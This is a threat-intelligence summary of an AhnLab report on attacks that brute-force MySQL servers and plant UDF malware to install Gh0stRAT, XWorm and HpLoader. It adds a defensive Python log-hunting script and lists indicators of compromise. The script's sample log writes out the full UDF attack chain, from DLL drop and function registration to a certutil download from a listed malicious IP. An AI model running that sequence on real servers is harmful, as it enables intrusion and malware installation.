Case of Attacks Targeting MySQL Servers to Install RAT Malware

AhnLab SEcurity intelligence Center (ASEC) reports continuing attacks against poorly managed MySQL servers, mainly delivering Gh0stRAT variants alongside other malware strains such as XWorm and HpLoader. The threat actors gain access to servers with poorly managed credentials, load UDF (User Defined Function) malware into the MySQL server to execute commands, and have recently abused the legitimate remote control tool Zoho ManageEngine to control infected systems. #MySQL #Gh0stRAT #XWorm #HpLoader #ZohoManageEngine

Keypoints

  • MySQL servers remain a continuous target, especially Windows installations that expose 3306/TCP to the internet.
  • Threat actors load User Defined Function (UDF) malware into compromised MySQL servers: a malicious DLL is uploaded to the server and registered as a UDF, giving the actor OS command execution and a way to fetch further payloads.
  • Gh0stRAT variants predominate; some bundle a privilege escalation tool built from commands extracted from the UACMe UAC bypass toolkit, and some add screen capture.
  • XWorm, a RAT with extensive control features including credential theft and DDoS, is also deployed.
  • The HpLoader downloader delivers additional malware in some attacks and is recognizable by the "hpsocket" string it sends to its C&C server on first contact.
  • Recently, the legitimate remote control software Zoho ManageEngine has been abused: its endpoint agent is installed in silent mode on compromised systems so the actor can manage them without a conventional backdoor.
  • Administrators should not expose 3306/TCP to the internet, use strong administrator passwords, run the MySQL service with the minimum privileges it needs, and apply the latest security patches.

MITRE Techniques

  • [T1110 ] Brute Force – Threat actors run brute-force or dictionary attacks against exposed MySQL 3306/TCP ports to obtain administrator account credentials. (‘Threat actors scan for attack targets by performing brute-force attacks or dictionary attacks, much like the attacks against MS-SQL servers’)
  • [T1210 ] Exploitation of Remote Services – With credentials for a poorly managed MySQL server in hand, the actors upload a DLL and load it into the MySQL server as a UDF; no software vulnerability is described, the access comes from the weak credentials. (‘Threat actors upload DLL libraries containing malicious commands to the infected system and load them into the MySQL server’)
  • [T1059 ] Command and Scripting Interpreter – The UDF malware executes commands; some versions also download a file from a URL passed as an argument and run it. (‘…there are also versions that support additional features, such as downloading files from URLs received as arguments and executing them’)
  • [T1548.002 ] Abuse Elevation Control Mechanism: Bypass User Account Control – Gh0stRAT variants include a privilege escalation tool built from commands extracted from UACMe, a UAC bypass toolkit. (‘…including a privilege escalation tool created by internally extracting certain commands from UACMe’)
  • [T1071 ] Application Layer Protocol – HpLoader sends the string “hpsocket” to its C&C server during initial communication, which makes its traffic recognizable. (‘HpLoader… characterized by sending the “hpsocket” string to the C&C server during the initial communication’)
  • [T1190 ] Exploit Public-Facing Application – Initial access comes through MySQL servers exposed to the internet; once administrator credentials are compromised the actors take control and install additional payloads. (‘…they can compromise the credentials of administrator accounts, take control of the infected system, and install additional payloads’)
  • [T1219 ] Remote Access Software – The legitimate remote control software Zoho ManageEngine is abused: its agent is installed in silent mode so the actor can control the system without installing a conventional backdoor. (‘…Zoho ManageEngine is being abused recently… install the agent on infected systems in silent mode’)
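The two observable stages above, the credential brute forcing (T1110) and the planting of a UDF DLL followed by its use to run commands and fetch payloads (the UDF keypoint and T1059), both leave traces in MySQL's own text logs. The hunt below is an added example, not code from the ASEC report: it matches the UDF sequence (`SELECT ... INTO DUMPFILE` writing a DLL, `CREATE FUNCTION ... SONAME` registering it, then a call to the new function) in the general_log, and counts "Access denied for user" messages per source IP in the error_log. The log lines are constructed for the example in MySQL 8's default text format; the list of known UDF function names, the failure threshold and the window are assumptions to tune against your own environment.

```python
"""Hunt for MySQL UDF planting and credential brute forcing in MySQL text logs.

Added example, not code from the ASEC report. It matches the sequence a UDF
backdoor needs (write a DLL with SELECT ... INTO DUMPFILE, register it with
CREATE FUNCTION ... SONAME, call it) in the general_log, and counts
'Access denied for user' messages per source IP in the error_log.
The log lines below are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed general_log excerpt (MySQL 8 text format: time<TAB>thread id command<TAB>argument).
GENERAL_LOG = (
    "2024-05-02T10:15:30.000000Z\t   12 Connect\troot@203.0.113.5 on  using TCP/IP\n"
    "2024-05-02T10:15:31.000000Z\t   12 Query\tSELECT 0x4D5A90000300 INTO DUMPFILE "
    "'C:\\\\Program Files\\\\MySQL\\\\MySQL Server 8.0\\\\lib\\\\plugin\\\\udf.dll'\n"
    "2024-05-02T10:15:32.000000Z\t   12 Query\tCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.dll'\n"
    "2024-05-02T10:15:33.000000Z\t   12 Query\tSELECT sys_exec('cmd /c certutil -urlcache -f "
    "http://39.108.132.22:8080/ceshi.exe C:\\\\Windows\\\\Temp\\\\ceshi.exe')\n"
    "2024-05-02T10:16:00.000000Z\t   13 Connect\tapp@10.0.0.7 on shop using TCP/IP\n"
    "2024-05-02T10:16:01.000000Z\t   13 Query\tSELECT id, price FROM products WHERE id = 42\n"
)

# Constructed error_log excerpt: eight failures from one IP within eight seconds, one stray failure elsewhere.
ERROR_LOG = "".join(
    f"2024-05-02T10:10:{i:02d}.000000Z 8 [Note] [Server] Access denied for user "
    f"'root'@'203.0.113.5' (using password: YES)\n"
    for i in range(8)
) + "2024-05-02T11:30:00.000000Z 9 [Note] [Server] Access denied for user 'app'@'10.0.0.7' (using password: YES)\n"

GENERAL_RE = re.compile(r"^(\S+)\t\s*(\d+) (\w+)\t(.*)$")
DUMPFILE_RE = re.compile(r"INTO\s+DUMPFILE\s+'([^']+)'", re.IGNORECASE)
CREATE_UDF_RE = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(\w+)\s+RETURNS\s+\w+\s+SONAME\s+'([^']+)'", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+")
DENIED_RE = re.compile(r"^(\S+)\s.*Access denied for user '([^']*)'@'([^']+)'")
TS_FMT = "%Y-%m-%dT%H:%M:%S.%fZ"
# Function names commonly exported by MySQL UDF backdoors (assumption; extend from your own samples).
KNOWN_UDF_NAMES = {"sys_exec", "sys_eval", "sys_get", "sys_set", "shell", "cmdshell"}


def parse_general_log(text):
    """Return (timestamp, thread_id, command, argument) tuples; non-matching lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = GENERAL_RE.match(line)
        if m:
            ts, thread, cmd, arg = m.groups()
            entries.append((ts, int(thread), cmd, arg))
    return entries


def detect_udf_abuse(entries):
    """Flag DUMPFILE writes, UDF registration, and calls to registered or known UDF names."""
    findings = []
    created = set()
    for ts, thread, cmd, arg in entries:
        if cmd != "Query":
            continue
        m = DUMPFILE_RE.search(arg)
        if m:
            path = m.group(1)
            # Writing into plugin_dir, or writing a native library anywhere, is the UDF staging step.
            high = "plugin" in path.lower() or path.lower().endswith((".dll", ".so"))
            findings.append({"kind": "dumpfile", "time": ts, "thread": thread, "path": path,
                             "severity": "high" if high else "medium"})
        m = CREATE_UDF_RE.search(arg)
        if m:
            created.add(m.group(1).lower())
            findings.append({"kind": "udf_created", "time": ts, "thread": thread,
                             "function": m.group(1).lower(), "library": m.group(2), "severity": "high"})
        called = sorted(n for n in created | KNOWN_UDF_NAMES
                        if re.search(rf"\b{re.escape(n)}\s*\(", arg, re.IGNORECASE))
        if called:
            findings.append({"kind": "udf_called", "time": ts, "thread": thread, "functions": called,
                             "urls": URL_RE.findall(arg), "severity": "critical"})
    return findings


def detect_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: peak failures inside any `window`} for IPs that reach `threshold`."""
    per_ip = defaultdict(list)
    for line in text.splitlines():
        m = DENIED_RE.match(line)
        if m:
            per_ip[m.group(3)].append(datetime.strptime(m.group(1), TS_FMT))
    hits = {}
    for ip, times in per_ip.items():
        times.sort()
        best = left = 0
        for right, t in enumerate(times):  # sliding window over the sorted timestamps
            while t - times[left] > window:
                left += 1
            best = max(best, right - left + 1)
        if best >= threshold:
            hits[ip] = best
    return hits


if __name__ == "__main__":
    for finding in detect_udf_abuse(parse_general_log(GENERAL_LOG)):
        print(finding)
    print(detect_bruteforce(ERROR_LOG))
```

The general_log is off by default and costly on busy servers; the same three-stage pattern can be hunted after the fact from `mysql.func` (registered UDFs) and from unexpected files in `plugin_dir`. Two settings are worth checking alongside: `secure_file_priv` should point to a directory other than `plugin_dir` (an empty value lets `INTO DUMPFILE` write anywhere the service account can), and the account running mysqld should not have write access to `plugin_dir`, which removes the staging step the UDF loader depends on.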

Indicators of Compromise

  • [MD5 Hash] Malware file hashes identified during investigation – 2cd59cff23a2e0f98e710bf52b799154, 33096e0bc0785ffb2094054bebb9be26, and 3 more hashes.
  • [URL] Malicious payload download locations – http://39.108.132.22:8080/ceshi.exe, http://star.zcnet.net:7766/Server.exe
  • [FQDN] Command and control server domains – star.zcnet.net, yyinfo8999.fit
  • [IP Address] Malicious infrastructure IPs – 103.101.178.170, 154.204.177.54, 154.222.24.186, 39.108.132.22


Read more: https://asec.ahnlab.com/en/88514/